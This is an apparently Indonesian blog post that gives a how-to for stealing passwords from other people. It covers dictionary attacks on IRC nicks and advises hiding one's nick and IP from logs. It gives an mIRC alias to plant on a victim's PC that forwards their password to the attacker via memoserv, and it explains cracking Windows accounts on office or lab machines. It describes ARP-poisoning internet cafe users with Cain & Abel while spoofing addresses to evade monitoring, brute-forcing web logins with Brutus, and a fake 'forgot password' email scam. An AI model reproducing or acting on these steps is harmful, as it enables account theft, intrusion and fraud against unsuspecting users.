kali ini saya akan membeberkan tentang cara cracing password
yah,silahkan di baca.
heheheee...
kalo kurang paham boleh tanya di comment
//------Basa Basi.
Program dan script pada tutorial yang akan dibahas di bawah ini dapat anda download di
http://www.geocities.com/ferdianelli/passkrek.html
//------Crack password nickname dan channel IRC.
Tool : Script : WiCkEd IRC Password Cracker 1.3.
Dictionary attack atau menjebol password dengan menggunakan sejumlah kata-kata atau kombinasi
huruf yang terdapat pada text dokumen dapat dilakukan dengan script di mIRC.
Copykan file crack.mrc ke direktori dimana mIRC berada (biasanya di C:\program files\mIRC) . Di
kolom status ketik /load –rs crack.mrc.
Lalu klik kanan dan pilih Password Cracker > Nick atau Chan Cracker > dan set terlebih dahulu nick,
dictionary ,speed. Setelah itu baru klik start. Jika ternyata password target tidak berhasil dijebol, itu
artinya password yang digunakan target tidak terdapat pada kata-kata di teks file. Kita dapat
mengganti file dictionary-nya dan mencoba lagi.
61
Ada hal yang perlu diperhatikan. Ketika melakukan brute force identify terhadap nick/channel, server
dal.net akan mencatat setiap aktivitas identify yang berhasil ataupun gagal. Itu artinya nickname dan
IP address yang anda gunakan saat itu akan tercatat ke file log. Ada baiknya anda tidak menggunakan
nickname anda ataupun IP address pribadi. Sebab,jika sial-sialnya pas lagi nge-crack ketahuan ama irc
operator / csop, nick atau IP address akan di-blacklist.
Cara lain untuk mendapatkan password irc nickname adalah dengan memasukkan script ke PC korban.
Lagi-lagi ini butuh kelicikan… Pikirin sendiri ya caranya.
Berikut dibawah ini adalah script yang dijalankan di mIRC korban. Kombinasikan tombol ALT dan R
bersamaan lalu klik tabel “aliases”, copy dan paste script dibawah secara sederet dan tidak melangkah
ke baris bawah :
/identify /identify $$1 | /identify $$1 $2 | /memoserv send poni(ganti sendiri) my pass : $1 $2 | /clear | /identify $$1 $2
Fungsi : user yang meng-identify nick atau channel akan mengirimkan passwordnya ke nick poni.
//------Crack password Windows Komputer Lokal.
Tool : Advanced NT Security Explorer (ANTExp) vers 2.0.
Komputer di kantor atau Lab sekolah anda memiliki beberapa user account rahasia dengan password
protection ? Pake aja “Advanced NT Security Explorer (ANTExp)”
62
Setelah program dijalankan, anda akan melihat tampilannya seperti dibawah ini. Klik di “Registry
Dump”, pilih Local Machine. klik Load. Maka anda akan melihat sejumlah user account yang terdapat
pada komputer tersebut. Ceklis user account yang akan di-crack lalu klik di “Attack”. Anda dapat
memilih salah satu metode password cracking. Metode yang didukung antara lain : Brute Force attack,
Mask Attack atau Dictionary attack. Sebagai catatan, jika anda memilih metode “Brute force”, anda
disarankan untuk men-setting “Length” minimum = 1 dan maksimum = 14. pada bagian “Range” anda
dapat menentukan karakter yang akan dikombinasikan. Lalu di klik “Start Recovery” (gambar panah
berwarna biru). Tungguin aja prosesnya. Durasi waktu untuk meng-crack password tergantung
panjangnya password user account dan juga spesikasi hardware komputer.
Advanced NT Security Explorer (ANTExp) tidak dapat menjebol password diatas 14 karakter.
Tetapi jarang-jarang ada admin yang nge-set passwordnya sampai diatas 14 karakter.
//------Panen password di dalam jaringan komputer.
Tool : Cain & Abel Vers.4.2
Cain & Abel adalah sebuah program yang sangat mengagumkan. Jika anda menjalankannya di warnet.
Anda hanya perlu duduk dan melihat password password bermunculan di monitor anda. tergantung
apa yang dilakukan user di warnet tersebut. ). Cain & Abel dapat menangkap paket, menyaring
password dan aktivitas lain yang anda lakukan didalam sebuah jaringan lokal. Itulah alasan mengapa
sangat tidak aman melakukan login dan transaksi online di warnet,LAN (Local Area NetWork),
WLAN (Wireless LAN).
63
Ok. Saya asumsikan anda telah menginstall Cain & Abel dan WinPcap(Windows Packet Capture,
tersedia satu paket pada setup). Atur terlebih dahulu konfigurasi Cain & Abel. Klik Configure dan
anda akan masuk ke configure dialog. Secara default program ini akan mendeteksi ethernet card
komputer yang anda gunakan. Masuk ke bagian APR(Arp Poison Routing) dan pilih Use Arp Request
Packet (More Network Traffic). Karena untuk menangkap password user, kita perlu mendapatkan apa
yang dikirimkan komputer user ke server bukan apa yang dikirimkan oleh server ke komputer user.
User Internet Explorer yang melakukan Login ke sebuah website umumnya password yang dikirim
tidak terenkripsi. Disarankan untuk memilih Use spoofed IP and MAC addresses dan mengisinya
dengan IP komputer lain yang terdapat didalam satu jaringan. Anda tentu tidak ingin menggunakan
Use Real IP and MAC addresses karena server didalam suatu jaringan umumnya juga terdapat
program network monitoring. IP address lokal anda akan tercatat dan ketahuan ketika semua paket
didalam jaringan ternyata melalui komputer anda.
Setelah selesai mengatur konfigurasi, klik Start/Stop Sniffer dan Start/Stop APR. Lalu di bagian sub
menu Sniffer pilih Host dan klik add to list untuk Scan IP Lokal, tipe ethernet card dan MAC address
semua komputer yang ada pada jaringan. Pilih APR ,klik add to list dan masukkan IP korban serta IP
server untuk membajak paket komputer korban dengan meracuni ARP routing.
Saatnya anda melakukan aktivitas lain sembari menunggu para korban melakukan login ke
website,icq, FTP dan lain lain.
Fungsi Cain & Abel terlalu banyak untuk dijelaskan secara satu-persatu pada artikel ini. Jika kita
mengutak-atik lebih jauh dan mempelajari kegunaannya, Tidak salah jika Cain & Abel disebut sebagai
“Program wajib para Hacker dan analis keamanan jaringan komputer”.
64
//------Passware Kit Enterprise vers.6.1.
Passware Kit Enterprise adalah sebuah software dengan bundel program password recovery yang
cukup lengkap untuk menangani masalah lupa password. Penjebolan password yang didukung oleh
Passware Kit Enterprise vb 6.1 adalah sbb:
Lotus1-2-3, Acrobat, Symantec Act Batabase, Backup, EFS NTFS
partition, FileMaker, Internet Explorer, Lotus Notes ID Notes,
Micosoft Mail, Microsoft Money Database, MYOB, Microsoft Office
(Excel,Word,Access,Powerpoint,Outlook,VBA), Organizer, Outlook
Express, Paradox, Peachtree Accounting, Microsoft Project, Quattro
Pro, QuickBooks, Quicken, RAR, Schedule, Windows XP-2000-NT,
WordPerfect, WordPro, Zip
Program ini tidak akan dijelaskan disini karena penggunaannya cukup mudah. Drag & drop saja file
yang akan di-crack dan tunggu prosesnya.
65
//------Crack password website.
Tool : Brutus - Authentication Engine Test vers.2
Penjebolan terhadap sebuah server web dengan penggunaan Brutus-AET sudah sering dibahas. Tetapi
tidak ada salahnya jika penulis menambahkan pada tutorial ini sebagai referensi. Sampai sekarang
Brutus masih menjadi tool andalan para hacker (sistem analis juga….) untuk mendapatkan username
dan password valid yang dapat menjadi akses ke web tersebut.
Penggunaanya juga cukup mudah karena menggunakan GUI (Graphic User Interface). Isi alamat IP di
kolom Target, pilih Type atau service yang didukup oleh web sepeti HTTP, FTP, POP3, Telnet dan
SMB. Klik start dan biarkan si brutus melakukan tugasnya. Jika anda sudah mengetahui nama user
target, cukup isikan ID Login di user file dan ceklis Single User. Konfigurasi dan metode penjebolan
password dapat anda tentukan sendiri.
//------
Social Engineering.
Sosial engineering atau “teknik menipu”. Meskipun sangat konyol, sangat LAMER atau
kuno.Ternyata juga sangat akurat diterapkan untuk mendapatkan password dari account e-mail, irc
nickname dll. Saya ingin membagikan pengalaman nyata ini kepada pembaca supaya anda lebih
berhati-hati jika suatu saat menemui kasus seperti cerita dibawah ini.
Di channel coba perhatikan user yang chat (Biasanya di channel hacking atau channel help. Di mIRC
pakai perintah /list #*HACK* atau /list #*HELP*)
66
(korban) has joined #BlaBlaBla
segera (ini tipe orang jahat yang dijahati oleh orang lain)
Subject : FORGET PASSWORD? Isinya : I Forgot My Password, Please send me the password
immediately
Forgotten mail password : emailygmaudibantai@yahoo.com .
My current e-mail Password : pake password email eloe yang sekarang. Harus cocok loh.
Kirim ke ForgetPass@yahoo.com (ini e-mail boongan yang kita buat sendiri.Anda bisa buat sendiri
dan bikin alamat e-mail yang cukup meyakinkan korban
met mencoba yah
CRACKING PASSWORD.
Posted by electroclass-1 at 9:01:00 AM
Labels: hacking
Subscribe to:
Posting Komentar (Atom)
0 Comments:
Posting Komentar